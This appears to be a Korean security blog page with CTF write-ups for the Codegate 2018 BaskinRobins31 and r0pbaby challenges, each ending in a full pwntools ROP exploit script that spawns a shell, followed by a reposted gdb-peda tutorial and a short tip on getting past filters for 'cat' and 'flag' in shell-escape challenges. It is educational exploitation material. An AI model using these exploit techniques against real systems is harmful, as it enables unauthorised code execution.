대회 당시에는 64bit 운영체제에 대한 지식이 없어서 건들지 못했는데 최근 공부하면서 문제를 풀었다.

유명한 베스킨라빈스31 게임이다.

1에서 3까지의 수를 입력하면서 31부터 수를 떨어뜨리는 건데

이게 컴퓨터가 무조건 이기도록 구조가 되어있어서 일반적인 게임으론 풀 수 가 없다.

따라서 익스플로잇을 통해 쉘을 얻으라는 건데..

우선 gdb와 ida로 열어서 봤다.



이겼을 경우 jmp하는 루틴을 보면 Hint로 ROP라는 문구를 출력해주고 main()함수를 종료한다.

근데 뭐 일반적인 경우로 이 루틴을 거칠 수는 없고 힌트로 준 rop를 이용해 문제를 풀려고 해야한다.


어디서 오버플로우가 터질지 찾아보았는데.

사용자 입력을 받는 부분은 1-3까지의 수를 입력하는 부분이다.


그래서 그 부분을 살펴봤다.

보면 솔직히 1에서 3까지의 숫자를 입력받을 거면서 190h 바이트를 받는게 좀 이상하다.

여기가 취약하다고 티를 내는 것 같다.

그래서 일단 저기에 100바이트의 A를 입력하고 ret와의 거리를 계산해서 ret를 덮을 수 있는지 확인해 봤다.


내가 입력한 A 100바이트는 [$rbp-0xb0]에 들어가게 된다.

그리고 ret의 위치인 rbp+0x8과의 거리를 보면 0xb8이다.

즉 사용자가 최대로 입력할 수 있는 0x190보다 작은 0xb8의 diff를 가지고 있으므로 ret를 덮을 수 있다.

다시말해 오버플로우가 가능하다.


이제 이 공격벡터를 이용해서 rop를 실행하면 된다.


먼저 rop에 필요한 가젯을 찾아야 한다.

공략 단계

1. gdb로 write()와 read()의 plt, got를 찾는다.

2. system()함수의 offset을 구한다.

3. system()함수에 사용할 pop rdi ; ret 가젯을 찾는다.

4. write()함수에 got overwrite를 하기 위해 pop rdi ; pop rsi ; pop rdx ; ret 가젯을 찾는다.

5. /bin/sh 문자열을 입력할 bss영역의 주소를 찾는다.


read@plt = 0x400700

read@got = 0x602040


write@plt = 0x4006d0

write@got = 0x602028


system함수의 offset은 gdb에서 간단하게 read와의 차이로 구했다.


가젯은 rp++툴을 이용해서 구했다.

pop_rdi gadget = 0x400bc3


마찬가지로 rp++로 가젯을 구했다.

pppr gadget = 0x40087a


마지막으로 bss영역의 주소를 구했다.


이제 익스플로잇 코드를 작성한다.


처음에 write()함수를 이용해서 read함수의 바이너리 상 주소를 알아낸 후 system 주소를 릭해야 한다.

따라서 write(1, read@got, 8) 함수를 먼저 시작해준다.

그리고 rop를 진행하면 된다.


exploit code

from pwn import *

p = process("./BaskinRobins31")

read_plt = 0x400700
read_got = 0x602040
write_plt = 0x4006d0
write_got = 0x602028
pr = 0x400bc3
pppr = 0x40087a
bss = 0x602090
system_offset = 0xb1ec0 

payload = "A"*184 

payload += p64(pppr)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

payload += p64(pppr)
payload += p64(0)  
payload += p64(bss)
payload += p64(8)  
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(write_got)
payload += p64(8)
payload += p64(read_plt)

payload += p64(pr) 
payload += p64(bss)
payload += p64(write_plt)

log.info('Exploit..')
p.sendline(payload)

read_addr = u64(p.recv()[-8:])
log.info("read_addr = {}".format(hex(read_addr)))

log.info("system_offset = {}".format(hex(system_offset)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))
p.sendline("/bin/sh")
p.sendline(p64(system_addr))
p.interactive()


Ref.http://d4m0n.tistory.com/84

'CTF > Codegate' 카테고리의 다른 글

codegate2019 20000  (0) 2019.02.07
codegate 2018 super marimo  (0) 2019.01.19
Codegate 2018 RedVelvet writeup  (0) 2018.02.04

r0pbaby

문제 바이너리다.


64비트용 바이너리로 ubuntu 64에서 실행했다.


checksec로 보호기법을 확인해봤다.

PIE, NX가 걸려있다.

검색을 해보면 짧게 설명한게 

PIE 보호기법은 공격시 바이너리 주소를 이용하지 못하도록 파일을 실행 할 때마다 해당 주소를 랜덤하게 바꿔주는 것이라고 한다.

즉 바이너리용 ASLR이라고 생각하면 된다.


그래서 이 문제를 풀려면 직접 offset을 다 구해서 풀어야 한다.


우선 바이너리를 실행시키면 아래와 같이 메뉴선택을 하는 부분이 나온다.

1번을 누르면 libc의 주소가 나오고, 2번을 누르면 내가 원하는 libc함수의 주소를 얻을 수 있다.

대놓고 rop를 하라는 뜻인거 같다.


3번을 누르면 스택에 값을 삽입하는데 "A"를 8개 삽입했더니 rbp가 "A" 8개로 덮여졌다.

즉 저기서 오버플로우가 일어나는 것이다.

공격벡터를 파악 했으므로 익스플로잇 코드를 작성해보자.


먼저 libc에서의 offset을 구해야한다.

system의 주소는 2번을 눌러서 구하면 되므로 패스하고(우선 offset을 구하기 위해 gdb에서 p system으로 구한다.),

/bin/sh의 문자열은 peda의 find기능을 이용해 찾도록 한다.

그리고 이제 system("/bin/sh")의 구조를 완성해주기 위한 pop rdi; ret 가젯을 구해야 한다.

난 rp++ 툴을 이용해 구했다.

많은 주소 중에 0x21102로 정했다.

이제 system()함수의 주소를 이용해 offset을 구한 후 익스 코드를 작성했다.


exploit code

from pwn import *

p = process('./r0pbaby')

libc_system = 0x45390 
libc_prr = 0x21102 
libc_binsh = 0x18cd57

print p.recv()
p.sendline("1")
libc = p.recvuntil("libc.so.6") + p.recvuntil("\n")
libc = int(libc.split("\n")[0].split(" ")[1], 16)
p.sendline("2")
print p.recv(1024)
p.sendline("system")
system = p.recvuntil("Enter symbol") + p.recvuntil("\n")
system = int(system.split("\n")[0].split(": ")[2], 16)

print "libc = {0}, system = {1}".format(hex(libc), hex(system))
binsh = system + (libc_binsh - libc_system)
prr = system - (libc_system - libc_prr)

payload = "A"*8 
payload += p64(prr)
payload += p64(binsh)
payload += p64(system)
p.sendline("3")
p.sendline("36")
p.sendline(payload)
p.interactive()



'CTF' 카테고리의 다른 글

pico-ctf-2013 rop-4  (0) 2018.07.17
pico-ctf-2013 rop-3  (0) 2018.07.14
pico-ctf-2013 rop-2  (0) 2018.07.14
pico-ctf-2013 rop-1  (0) 2018.07.14
PlaidCTF 2013 ropasaurusrex  (0) 2018.07.14

출처 : https://hexa-unist.github.io/2015/02/26/PEDA-How-To-Use/

PEDA 기본 인터페이스

우선 PEDA의 기본적인 화면은 위와 같습니다.

display 같은 걸 해주지 않으면 기본적으로 화면에 아무것도 안 나오는 gdb와 달리 PEDA는 기본적으로 현재 레지스터의 상태와 실행 중인 명령어와 그 주변 명령어들, 스택의 내용물 등을 표시해줍니다.

특히나 정말 멋진 기능 중 하나는 포인터를 따라가서 그 내용물까지 보여주는 기능입니다.
위 그림에서 레지스터 부분이나 스택 부분을 보면 포인터를 따라가서 그 안의 내용까지 보여주는 걸 볼 수 있습니다. PEDA 짱짱맨!!

그러면 이제 PEDA의 다양한 기능들을 하나씩 하나씩 들여다보겠습니다.

pdisas

pdisas는 gdb에서 쓰던 disas 명령어의 확장판입니다.

위 그림을 보면 알 수 있듯이 pdisas를 사용하면 알록달록한! 컬러풀한! 가독성이 더 높아진 버전의 disas 결과물을 볼 수 있습니다. PEDA는 gdb의 확장이므로 물론 원래 gdb의 기능들도 모두 사용 가능합니다. 그래서 pdisas 와 disas를 위 그림처럼 비교해보면 확실히 pdisas가 컬러링이 잘 돼있어 가독성이 높은 걸 알 수 있습니다.

How to use

1
gdb-peda$ pdisas "Function Name"

Example

1
gdb-peda$ pdisas main

context code / register / stack

context 명령어는 별다른 기능이 아니라 맨 처음에 보여드렸던 PEDA 기본인터페이스 에서 code영역 register영역 stack영역을 따로 따로 볼 수 있는 기능입니다.

How to use

1
gdb-peda$ context "code/register/stack/all" ( context 만 입력시엔 context all 과 같습니다. )

Example

1
2
3
gdb-peda$ context
gdb-peda$ context code
gdb-peda$ context all

session save / restore

session 명령어! 정말 편리한 기능을 제공하는 명령어입니다.
기존 gdb에서는 열심히 분석하면서 break point도 걸어놓고 watch point도 걸어놓고 해 놓더라도 gdb를 껐다 다시 키면 전부 없어지는데 peda에서는 session이라는 명령어로 break point와 같은 설정들을 저장하고 불러오는게 가능합니다.

위 그림에서도 맨 처음에 info b 를 했을때, “No breakpoints or watchpoints” 가 나오는데 session restore 명령어를 치고 난 후 info b 를 해보면 저장해 놓았던 설정들을 그대로 가져오는 것을 볼 수 있습니다.

How to use

1
2
gdb-peda$ session save "파일이름" ( 파일이름 생략시엔 peda-session-"실행파일이름".txt 로 저장 )
gdb-peda$ session restore "파일이름" ( 파일이름 생략시엔 peda-session-"실행파일이름".txt 로드 )

Example

1
2
3
4
gdb-peda$ session save
gdb-peda$ session restore
gdb-peda$ session save MySession
gdb-peda$ session restore MySession

snapshot save / restore

이것도 상당히 재밌는 기능인데, session 이 break point나 watch point 들을 저장하고 불러온다면 이 명령어는 아예 현재 디버깅중인 프로세스의 스냅샷을 찍어 저장하고 불러올수있게 합니다. 사용법은 session과 동일합니다.

vmmap

이 명령어는 현재 디버깅 중인 프로세스의 Virtual Memory MAP을 보여줍니다.
그냥 vmmap 만 입력할 시에는 vmmap all 과 같으며 위 그림과 같이 vmmap binary, vmmap stack 이런 식으로 특정 메모리 영역만 볼 수도 있습니다.

원래 gdb로 했었더라면 현재 프로세스의 pid를 알아내고 shell cat /proc/“pid”/maps 를 해서 봐야 했을 텐데 PEDA를 사용하면 아주 간단하게 메모리 매핑 상태를 보는 게 가능합니다.

여기서 추가적으로 더 나아가서 얘기하자면, vmmap stack을 사용해서 현재 stack의 권한을 보고 해당 바이너리가 NX가 걸렸는지 안 걸렸는지도 알 수 있습니다.

How to use

1
gdb-peda$ vmmap "all/binary/libc/stack/ld ..." ( 인자를 생략할 시에는 vmmap all 과 같습니다. )

Example

1
2
3
gdb-peda$ vmmap
gdb-peda$ vmmap libc
gdb-peda$ vmmap stack

checksec

이 명령어는 현재 바이너리에 걸려있는 보안 기법들을 보여줍니다. 사용법은 간단히 그냥 checksec을 입력하기만 하면됩니다. 근데 여기서 주의해야 할 게 다른 건 몰라도 여기서 표시되는 NX는 별로 신뢰하지 않는 게 좋습니다. 버그가 있는지는 몰라도 NX가 안 걸려있는데 걸려있다고 나온다던가… 이런 경우가 몇 번 있어서 통수 맞은 적이 있네요 ㅠㅠ

그래서 밑에서 소개할 nxtest 라는 명령어 또는 vmmap stack과 같은 명령어로 다른방법을 사용해서 NX는 따로 체크해주시는게 좋을 것 같습니다.

How to use

1
gdb-peda$ checksec

nxtest

nxtest는 말그대로 NX 가 걸려있는지 테스트 해주는 명령어로 스택에 실행권한이 있는지 체크합니다.

How to use

1
gdb-peda$ nxtest

procinfo / getpid

procinfo 는 현재 디버깅중인 프로세스의 정보를 위 그림과 같이 표시해 줍니다.
pid만 필요하다면 getpid 명령어를 사용하는걸로 pid만 얻을수도 있습니다.

How to use

1
2
gdb-peda$ procinfo
gdb-peda$ getpid

elfsymbol

이게 또 참 편리한 기능인데, elfsymbol이라는 명령어로 현재 디버깅 중인 바이너리의 plt 주소, got 주소 등을 알 수 있습니다. exploit 코드를 작성할 때 got overwrite을 한다거나 got 주소를 leak 시켜온다거나 여러 가지의 상황에서 plt 주소와 got 주소가 필요한 경우가 종종 있는데 이럴때 elfsymbol 명령어를 이용하면 아주 쉽게 정보를 얻을 수 있습니다.

How to use

1
gdb-peda$ elfsymbol "symbol" ( 인자를 생략하면 symbol들을 모두 보여줍니다. )

Example

1
2
gdb-peda$ elfsymbol
gdb-peda$ elfsymbol printf

elfheader

elfheader 명령어는 현재 디버깅 중인 바이너리의 헤더 정보들을 보여줍니다. 이 기능도 exploit 코드를 작성할 때 종종 bss 영역의 주소가 필요하다거나 하는 경우가 있는데 이럴 때 사용하면 유용합니다.

How to use

1
gdb-peda$ elfheader

Example

1
2
gdb-peda$ elfheader
gdb-peda$ elfheader .bss

find / searchmem

find와 searchmem 은 동일한 명령어로 아무거나 선호하는 걸로 사용하시면 되며, 이 명령어는 메모리 영역에서 특정 패턴을 찾아줍니다.
다양한 방법으로 응용될 수 있는데, 몇가지 예시를 들자면 위 그림과 같이 /bin/sh 문자열의 주소를 찾는다던가 특정 OPCODE를 메모리에서 찾는다던가 하는게 가능합니다.

How to use

1
gdb-peda$ find/searchmem "pattern" "범위" ( 범위부분을 생략하면 binary 영역으로 세팅 됩니다.)

Example

1
gdb-peda$ find /bin/sh libc

ropgadget / ropsearch / dumprop

ropgadget 과 ropsearch 명령어는 ROP를 할 때 필요한 가젯들을 쉽게 찾을 수 있도록 도와주는 명령어입니다. ropgadget은 자주 쓰이는 가젯들인 pop-ret, leave-ret, add esp 와 같은 가젯들을 찾아줍니다. 또한 ropsearch는 원하는 특정 가젯을 찾을 수 있도록 도와줍니다.

dumprop도 비슷한 명령어인데, 이 명령어는 특정 가젯을 찾기 보다 특정 메모리 영역에서 모든 가젯들을 보고 싶을 때 유용합니다. 하지만 ropsearch ‘’ binary 이런 식으로 사용하면 ropsearch 로도 dumprop와 비슷하게 사용할 수 있습니다.

How to use

1
2
3
gdb-peda$ ropgadget binary/libc/vdso/all ... ( 인자를 생략하면 ropgadget binary 와 같습니다. )
gdb-peda$ ropsearch "gadget" "범위" ( gadget 부분을 '' 로 빈 상태로 보내면 모든 가젯을 찾습니다. )
gdb-peda$ dumprop "범위" ( 인자를 생략하면 dumprop binary 와 같습니다. )

Example

1
2
3
4
5
6
7
8
gdb-peda$ ropgadget
gdb-peda$ ropgadget libc
gdb-peda$ ropsearch "add esp, ?" binary
gdb-peda$ ropsearch "int 0x80" libc
gdb-peda$ ropsearch "" binary ( binary 범위에서 모든 가젯을 찾습니다. )
gdb-peda$ ropsearch "pop ?" 0x08048000 0x0804b000
gdb-peda$ dumprop binary
gdb-peda$ dumprop 0x08048000 0x0804b000

jmpcall

이 명령어도 ROP 할 때 유용한 가젯들을 찾아주는데, 그중 jmp와 call 가젯들을 전부 찾아줍니다. 그냥 jmpcall 만 입력하면 바이너리 영역 내의 모든 jmp, call 가젯들을 찾아주며 jmpcall esp libc 처럼 특정 메모리 영역 내의 특정 jmp, call 가젯들만 찾을 수도 있습니다.

How to use

1
gdb-peda$ jmpcall "register" "범위" (인자들을 모두 생략하면 jmpcall "" binary 와 같으며, 바이너리 영영 내 모든 jmp, call 가젯들을 찾아줍니다.)

Example

1
2
3
4
5
gdb-peda$ jmpcall
gdb-peda$ jmpcall "" libc
gdb-peda$ jmpcall esp libc
gdb-peda$ jmpcall [eax] libc
gdb-peda$ jmpcall eax ( jmpcall eax binary 와 같습니다. )

shellcode

PEDA에는 기본적으로 제공해주는 쉘코드가 몇 가지 있는데 shellcode generate 란 명령어로 현재 가능한 쉘코드 종류를 볼 수 있고, shellcode generate x86/linux exec 이런 식으로 지정하여 필요한 쉘코드를 바로바로 얻을 수도 있습니다.

현재 PEDA에 기본적으로 내장되어 있는 쉘코드는 x86/linux, bsd 뿐이지만 shellcode search나 display로 쉘코드를 웹에서 가져올 수도 있습니다.

Example

1
gdb-peda$ shellcode generate x86/linux exec

이 외에도 PEDA는 많은 기능들을 제공하는데, PEDA에서 제공하는 다른 기능들도 살펴보시고 싶으시면, phelp 또는 peda help 를 입력하셔서 쭉 훑어보시면 됩니다.

PEDA 명령어나 명령어 활용법에 대해 다른 참고할만한 자료 및 사이트

  1. http://ropshell.com/peda/Linux_Interactive_Exploit_Development_with_GDB_and_PEDA_Slides.pdf
  2. http://security.cs.pub.ro/hexcellents/wiki/kb/toolset/peda


'HACKING > System hacking' 카테고리의 다른 글

_start() 함수  (0) 2018.07.27
nc -e 옵션 사용이 안될때  (0) 2018.07.19
Shell Escaping tips  (0) 2018.06.23
ROP를 익히기 좋은 문제들  (0) 2018.05.18
알아두면 좋은 명령어 모음 (다시 정리하자)  (0) 2018.05.13

보통 쉘 이스케이프 문제가 나오면 cat 이나 flag 라는 문자열을 막는데 개꿀 명령어들이 있다. 

fold : cat 하고 똑같음 nl : cat하고 똑같은데 줄 번호까지 보여줌 

`<[filename]` 하면 파일 소스 한 줄 보여준다.


출처

http://chaneyoon.tistory.com/385?category=663910

'HACKING > System hacking' 카테고리의 다른 글

nc -e 옵션 사용이 안될때  (0) 2018.07.19
gdb-peda 기능들  (0) 2018.07.08
ROP를 익히기 좋은 문제들  (0) 2018.05.18
알아두면 좋은 명령어 모음 (다시 정리하자)  (0) 2018.05.13
libc-database 사용법  (0) 2018.05.13

+ Recent posts